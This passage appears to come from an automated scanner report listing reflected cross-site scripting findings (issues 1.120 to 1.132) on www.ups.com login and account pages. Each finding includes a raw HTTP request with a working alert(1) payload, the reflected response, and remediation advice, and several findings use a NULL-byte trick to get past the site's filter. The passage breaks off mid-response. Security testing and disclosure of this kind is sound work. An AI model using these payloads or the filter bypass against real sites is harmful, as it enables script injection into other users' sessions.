This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /account/am/start?loc=en_US%00e96d0</script><script>alert(1)</script>eeee4ba8d58&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_e96d0</script><script>alert(1)</script>eeee4ba8d58';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_e96d0</script>
...[SNIP]...

1.120. https://www.ups.com/account/am/start [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %004ec10'-alert(1)-'cf7523a708f was submitted in the loc parameter. This input was echoed as 4ec10'-alert(1)-'cf7523a708f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /account/am/start?loc=en_US%004ec10'-alert(1)-'cf7523a708f&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
1)-'cf7523a708f';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_4ec10'-alert(1)-'cf7523a708f';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_4ec10'-alert(1)-'cf7523a708f';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.121. https://www.ups.com/account/am/start [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0056fb2"><script>alert(1)</script>5e2077907d2 was submitted in the loc parameter. This input was echoed as 56fb2"><script>alert(1)</script>5e2077907d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /account/am/start?loc=en_US%0056fb2"><script>alert(1)</script>5e2077907d2&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_56fb2"><script>alert(1)</script>5e2077907d2&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_56fb2%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B5e2077907d2%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.122. https://www.ups.com/account/us/start [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 1c510%0a5bec88f7632 was submitted in the REST URL parameter 2. This input was echoed as 1c510
5bec88f7632
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/us1c510%0a5bec88f7632/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:34 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40728


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/us1c510
5bec88f7632
/start?appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/a
...[SNIP]...

1.123. https://www.ups.com/account/us/start [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57780'%3bbaf8e0aa31b was submitted in the REST URL parameter 2. This input was echoed as 57780';baf8e0aa31b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/us57780'%3bbaf8e0aa31b/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40742


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
pid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/us57780';baf8e0aa31b/start?appid=OPENACCT';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/us57780';baf8e0aa31b/start?appid=OPENACCT';
actionUr
...[SNIP]...

1.124. https://www.ups.com/account/us/start [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44722"%20a%3db%20d499cf7b97a was submitted in the REST URL parameter 2. This input was echoed as 44722" a=b d499cf7b97a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us44722"%20a%3db%20d499cf7b97a/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40815


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/us44722" a=b d499cf7b97a/start?appid=OPENACCT">
...[SNIP]...

1.125. https://www.ups.com/account/us/start [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript rest-of-line comment. The payload b76c7%0a1e4ac2a860 was submitted in the REST URL parameter 3. This input was echoed as b76c7
1e4ac2a860
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/us/startb76c7%0a1e4ac2a860 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40718


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/us/startb76c7
1e4ac2a860
?appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account
...[SNIP]...

1.126. https://www.ups.com/account/us/start [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8dd7"%20a%3db%20a3fcf1e4a73 was submitted in the REST URL parameter 3. This input was echoed as a8dd7" a=b a3fcf1e4a73 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/starta8dd7"%20a%3db%20a3fcf1e4a73 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40815


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/us/starta8dd7" a=b a3fcf1e4a73?appid=OPENACCT">
...[SNIP]...

1.127. https://www.ups.com/account/us/start [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ead4'%3be1cc69c801d was submitted in the REST URL parameter 3. This input was echoed as 2ead4';e1cc69c801d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/us/start2ead4'%3be1cc69c801d HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40742


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
ENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/us/start2ead4';e1cc69c801d?appid=OPENACCT';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/us/start2ead4';e1cc69c801d?appid=OPENACCT';
actionUrl = "/
...[SNIP]...

1.128. https://www.ups.com/account/us/start [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b6c8d"><script>alert(1)</script>62dcb8e5408 was submitted in the loc parameter. This input was echoed as b6c8d"><script>alert(1)</script>62dcb8e5408 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /account/us/start?loc=en_US%00b6c8d"><script>alert(1)</script>62dcb8e5408&WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:10 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11232


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_b6c8d"><script>alert(1)</script>62dcb8e5408&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_b6c8d%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B62dcb8e5408%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.129. https://www.ups.com/account/us/start [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00a5b57'-alert(1)-'baf778aa453 was submitted in the loc parameter. This input was echoed as a5b57'-alert(1)-'baf778aa453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /account/us/start?loc=en_US%00a5b57'-alert(1)-'baf778aa453&WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10656


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
&appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_a5b57'-alert(1)-'baf778aa453&appid=OPENACCT';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_a5b57'-alert(1)-'baf778aa453&appid=OPENACCT';
actionUrl = "
...[SNIP]...

1.130. https://www.ups.com/account/us/start [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %004d539</script><script>alert(1)</script>a033567d25f was submitted in the loc parameter. This input was echoed as 4d539</script><script>alert(1)</script>a033567d25f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /account/us/start?loc=en_US%004d539</script><script>alert(1)</script>a033567d25f&WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11332


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_4d539</script><script>alert(1)</script>a033567d25f&appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_
...[SNIP]...

1.131. https://www.ups.com/cva [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 33597%0a293e9fe1556 was submitted in the REST URL parameter 1. This input was echoed as 33597
293e9fe1556
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cva33597%0a293e9fe1556 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44320


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d = "";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/cva33597
293e9fe1556
?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/cva33597
293
...[SNIP]...

1.132. https://www.ups.com/cva [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6b82'%3bf7a06e554b0 was submitted in the REST URL parameter 1. This input was echoed as e6b82';f7a06e554b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cvae6b82'%3bf7a06e554b0 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44337


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
